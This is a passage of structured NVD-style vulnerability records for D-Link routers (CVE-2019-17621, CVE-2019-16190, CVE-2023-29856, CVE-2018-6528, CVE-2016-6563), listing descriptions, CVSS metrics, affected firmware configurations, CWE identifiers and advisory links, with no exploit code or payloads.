"value": "The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network."
},
{
"lang": "es",
"value": "La URL de /gena.cgi del endpoint UPnP en el router Wi-Fi D-Link DIR-859 versiones 1.05 y 1.06B01 Beta01, permite a un atacante remoto no autenticado ejecutar comandos del sistema como root, mediante el env\u00edo de una petici\u00f3n HTTP SUBSCRIBE especialmente dise\u00f1ada en el servicio UPnP cuando se conecta a la red local."
}
],
"id": "CVE-2019-17621",
"lastModified": "2025-02-04T21:15:18.170",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2019-12-30T17:15:19.857",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-09-09 20:15
Modified
2024-11-21 04:30
Severity ?
Summary
SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | b | |
| dlink | dir-885l_firmware | * | |
| dlink | dir-885l | a | |
| dlink | dir-895l_firmware | * | |
| dlink | dir-895l | a |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7128EB8-BAAC-4979-87D6-B239B149F110",
"versionEndIncluding": "2.03",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:b:*:*:*:*:*:*:*",
"matchCriteriaId": "7B5CCB4E-0016-4FAA-BCCD-650E9D52B5E5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA5B0C80-9F95-4564-8623-19D1D6F33B7C",
"versionEndIncluding": "1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:a:*:*:*:*:*:*:*",
"matchCriteriaId": "DE084078-9669-45D5-A42E-D265B8EBA18D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD2AAFD7-3FF6-40B7-847E-60B0E3DD494C",
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:a:*:*:*:*:*:*:*",
"matchCriteriaId": "DC397246-E759-461B-98D9-9D6C9044D8AE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php."
},
{
"lang": "es",
"value": "SharePort Web Access sobre dispositivos D-Link DIR-868L REVB versiones hasta 2.03, DIR-885L REVA versiones hasta 1.20, y DIR-895L REVA versiones hasta 1.21, permite la omisi\u00f3n de autenticaci\u00f3n, como es demostrado por una petici\u00f3n directa al archivo folder_view.php o category_view.php."
}
],
"id": "CVE-2019-16190",
"lastModified": "2024-11-21T04:30:14.413",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-09-09T20:15:10.887",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-05-02 15:15
Modified
2024-11-21 07:57
Severity ?
Summary
D-Link DIR-868L Hardware version A1, firmware version 1.12 is vulnerable to Buffer Overflow. The vulnerability is in scandir.sgi binary.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 1.12 | |
| dlink | dir-868l | a1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.12:*:*:*:*:*:*:*",
"matchCriteriaId": "E12017CD-9CA6-436F-8749-42A0C0422F05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "0D8A8303-F830-477F-8944-F1149A0CD521",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [
{
"sourceIdentifier": "cve@mitre.org",
"tags": [
"unsupported-when-assigned"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L Hardware version A1, firmware version 1.12 is vulnerable to Buffer Overflow. The vulnerability is in scandir.sgi binary."
}
],
"id": "CVE-2023-29856",
"lastModified": "2024-11-21T07:57:35.347",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-05-02T15:15:23.697",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10325"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10325"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-03-06 20:29
Modified
2024-11-21 04:10
Severity ?
Summary
XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-860l_firmware | * | |
| dlink | dir-860l | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3887A644-753A-4CA3-9D79-0718057EEB3B",
"versionEndIncluding": "a1_fw110b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-860l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCDB9720-8F5A-4F02-A436-920CDAC15D69",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0624940E-9466-40BA-97E4-648537A092C0",
"versionEndIncluding": "reva_firmware_patch_1.08.b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE2D4824-B834-41EA-8F70-AF12720030C9",
"versionEndIncluding": "a1_fw112b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi."
},
{
"lang": "es",
"value": "Vulnerabilidad de Cross-Site Scripting (XSS) en htdocs/webinc/body/bsc_sms_send.php en D-Link DIR-868L DIR868LA1_FW112b04 y versiones anteriores; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 y versiones anteriores y DIR-860L DIR860LA1_FW110b04 y versiones anteriores permite que atacantes remotos lean una cookie mediante un par\u00e1metro receiver manipulado en soap.cgi."
}
],
"id": "CVE-2018-6528",
"lastModified": "2024-11-21T04:10:50.380",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-03-06T20:29:00.843",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-07-13 20:29
Modified
2024-11-21 02:56
Severity ?
Summary
Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cret@cert.org | http://seclists.org/fulldisclosure/2016/Nov/38 | Exploit, Mailing List, Third Party Advisory | |
| cret@cert.org | http://www.securityfocus.com/bid/94130 | Third Party Advisory, VDB Entry | |
| cret@cert.org | https://www.exploit-db.com/exploits/40805/ | Exploit, Third Party Advisory, VDB Entry | |
| cret@cert.org | https://www.kb.cert.org/vuls/id/677427 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2016/Nov/38 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/94130 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/40805/ | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.kb.cert.org/vuls/id/677427 | Third Party Advisory, US Government Resource |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-823_firmware | - | |
| dlink | dir-823 | - | |
| dlink | dir-822_firmware | - | |
| dlink | dir-822 | - | |
| dlink | dir-818l\(w\)_firmware | - | |
| dlink | dir-818l\(w\) | - | |
| dlink | dir-895l_firmware | - | |
| dlink | dir-895l | - | |
| dlink | dir-890l_firmware | - | |
| dlink | dir-890l | - | |
| dlink | dir-885l_firmware | - | |
| dlink | dir-885l | - | |
| dlink | dir-880l_firmware | - | |
| dlink | dir-880l | - | |
| dlink | dir-868l_firmware | - | |
| dlink | dir-868l | - | |
| dlink | dir-850l_firmware | - | |
| dlink | dir-850l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-823_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BCC02FC3-0BB2-41B4-9EDD-65AC1CE9AB5B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-823:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EC426833-BEA7-4029-BBBB-94688EE801BC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-822_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "10F0B001-DEDD-4B68-A63D-F68A8BAF9C1D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3894F0E-37F8-4A89-87AC-1DB524D4AE04",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-818l\\(w\\)_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4312D87E-181E-423A-90A1-C6F16AD58458",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-818l\\(w\\):-:*:*:*:*:*:*:*",
"matchCriteriaId": "3A208284-D9A8-4B97-A975-E7AF0D7110A0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2E62F905-D226-463C-8BA9-201E8B0165FD",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B9EBC5D-43DE-4B26-8272-5A9AD2ECE2E2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0BCCA2BB-4577-402C-88B5-F8E10770CA35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B1EA89C7-4655-43A3-9D2B-D57640D56C09",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3441E49F-C21B-4B68-89AD-BD46E8D88638",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD481B64-A25D-4123-B575-20EC3C524D9C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-880l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "52A89607-6CBB-4197-AF08-8A52FA73F703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "26512943-D705-484D-B9EA-BF401606DFA3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-850l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E72B76AE-8D5C-4FAD-A7FC-303CB0670C98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "607DDB44-0E4E-4606-8909-B624345688D4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L."
},
{
"lang": "es",
"value": "El procesamiento de mensajes SOAP mal formados al realizar la acci\u00f3n de inicio de sesi\u00f3n HNAP provoca un desbordamiento de b\u00fafer en la pila en algunos routers D-Link DIR. Los campos XML vulnerables en el cuerpo SOAP son: Action, Username, LoginPassword y Captcha. Los siguientes productos se han visto afectados: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L y DIR-850L."
}
],
"id": "CVE-2016-6563",
"lastModified": "2024-11-21T02:56:21.790",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
